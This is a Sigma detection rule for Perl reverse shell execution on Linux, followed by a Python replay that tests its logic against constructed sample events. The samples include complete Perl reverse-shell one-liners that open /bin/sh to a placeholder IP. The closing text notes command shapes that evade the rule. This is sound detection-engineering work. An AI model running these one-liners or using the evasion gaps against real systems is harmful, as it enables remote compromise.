Potential Perl Reverse Shell Execution

Detects execution of the perl binary with the "-e" flag and common strings related to potential reverse shell activity

Sigma rule

title: Potential Perl Reverse Shell Execution
id: 259df6bc-003f-4306-9f54-4ff1a08fa38e
status: test
description: Detects execution of the perl binary with the "-e" flag and common strings related to potential reverse shell activity
references:
    - https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
    - https://www.revshells.com/
author: '@d4ns4n_, Nasreddine Bencherchali (Nextron Systems)'
date: 2023/04/07
tags:
    - attack.execution
logsource:
    category: process_creation
    product: linux
detection:
    selection_img:
        Image|endswith: '/perl'
        CommandLine|contains: ' -e '
    selection_content:
        - CommandLine|contains|all:
              - 'fdopen('
              - '::Socket::INET'
        - CommandLine|contains|all:
              - 'Socket'
              - 'connect'
              - 'open'
              - 'exec'
    condition: all of selection_*
falsepositives:
    - Unlikely
level: high
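
The rule's detection logic replayed over a handful of constructed process_creation events, as an added example that is not part of the Sigma rule or of this page. Sigma's `contains` and `endswith` modifiers are case-insensitive unless `cased` is added, so the matcher lowercases both sides; `selection_img` ANDs its two fields, and the list of two maps under `selection_content` is ORed, with each map's `contains|all` ANDed. The sample command lines, IP addresses and ports are constructed placeholders, not real telemetry. The two reverse-shell shapes follow the pentestmonkey/revshells one-liners the rule references; the last two samples show command shapes the rule as written does not cover: `-e` glued to its argument with no trailing space, and a versioned interpreter path that does not end in `/perl`.

```python
"""Replay of the 'Potential Perl Reverse Shell Execution' Sigma logic over
constructed process_creation events (added example, not the rule's own code)."""

# Constructed sample events; addresses/ports are placeholders, not real telemetry.
SAMPLE_EVENTS = [
    # 0: classic Socket-based one-liner (hits the Socket/connect/open/exec alternative)
    {"Image": "/usr/bin/perl",
     "CommandLine": "perl -e 'use Socket;$i=\"10.0.0.1\";$p=1234;"
                    "socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));"
                    "if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">&S\");"
                    "open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\");};'"},
    # 1: IO::Socket::INET + fdopen variant (hits the fdopen(/::Socket::INET alternative)
    {"Image": "/usr/bin/perl",
     "CommandLine": "perl -MIO -e '$p=fork;exit,if($p);"
                    "$c=new IO::Socket::INET(PeerAddr,\"10.0.0.1:1234\");"
                    "STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'"},
    # 2: benign one-liner, no socket-related strings at all
    {"Image": "/usr/bin/perl",
     "CommandLine": "perl -e 'print \"hello\\n\"'"},
    # 3: benign connectivity check: contains Socket and connect, but no open/exec
    {"Image": "/usr/bin/perl",
     "CommandLine": "perl -e 'use IO::Socket::INET; my $s = IO::Socket::INET->new("
                    "PeerAddr => \"db.example.internal:5432\", Timeout => 3) "
                    "or die \"connect failed\"; print \"up\\n\"'"},
    # 4: same payload family as 0, but -e glued to its argument: no ' -e ' substring
    {"Image": "/usr/bin/perl",
     "CommandLine": "perl -e'use Socket;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));"
                    "connect(S,sockaddr_in(1234,inet_aton(\"10.0.0.1\")));"
                    "open(STDIN,\">&S\");exec(\"/bin/sh -i\");'"},
    # 5: versioned interpreter path: Image does not end in '/perl'
    {"Image": "/usr/bin/perl5.34",
     "CommandLine": "perl5.34 -e 'use Socket;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));"
                    "connect(S,sockaddr_in(1234,inet_aton(\"10.0.0.1\")));"
                    "open(STDIN,\">&S\");exec(\"/bin/sh -i\");'"},
]


def _contains_all(haystack, needles):
    """Sigma 'contains|all': every needle present, case-insensitive (no 'cased' modifier)."""
    h = haystack.lower()
    return all(n.lower() in h for n in needles)


def matches_rule(event):
    """True if the event satisfies 'condition: all of selection_*' as the rule is written."""
    image = event.get("Image", "")
    cmd = event.get("CommandLine", "")
    # selection_img: the two fields inside one map are ANDed
    selection_img = image.lower().endswith("/perl") and " -e " in cmd.lower()
    # selection_content: a list of two maps is ORed; each map's contains|all is ANDed
    selection_content = (
        _contains_all(cmd, ["fdopen(", "::Socket::INET"])
        or _contains_all(cmd, ["Socket", "connect", "open", "exec"])
    )
    return selection_img and selection_content


def run_detection(events):
    """Return the indices of the events the rule would alert on."""
    return [i for i, e in enumerate(events) if matches_rule(e)]


if __name__ == "__main__":
    for i in run_detection(SAMPLE_EVENTS):
        print(f"ALERT event {i}: {SAMPLE_EVENTS[i]['CommandLine'][:70]}")
```

Events 0 and 1 alert; event 3 does not, because the second alternative requires all four of Socket, connect, open and exec, which is what keeps a plain socket health check below the threshold. Events 4 and 5 carry the same payload but fall outside `selection_img`, so when reviewing telemetry it is worth checking how your sensor records the interpreter path and whether operators on the estate tend to write `-e'...'` without a space.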
